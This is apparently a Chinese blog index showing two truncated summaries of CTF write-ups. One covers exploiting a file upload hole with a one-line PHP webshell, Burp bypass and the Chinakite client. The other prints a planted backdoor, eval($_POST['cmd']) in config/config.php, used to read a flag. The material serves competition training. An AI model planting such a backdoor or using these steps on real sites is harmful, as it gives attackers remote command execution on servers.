摘要： 一打开网址，可以看出应该是文件上传漏洞，查看源码，也有可能是文件包含 上传个图片，成功，然后上传一句话木马 通过bp进行上传绕过 ， 开始菜刀连接http://e00b6eca3c9c4e14a31cf6ce409fab9006d33f25aeda472e.game.ichunqiu.com/upl 阅读全文

摘要： 1.后门 这里第一个后门应该很好找，这个是很友好的，这里后门位于config/config.php <?php eval($_POST['cmd']); ?> 很直接明了的一句话后门，没什么好说的，前一个小时还能打打，到后面肯定大家都修了，这个不多说。 这里我的flag留在了tmp目录下，所以直接读 阅读全文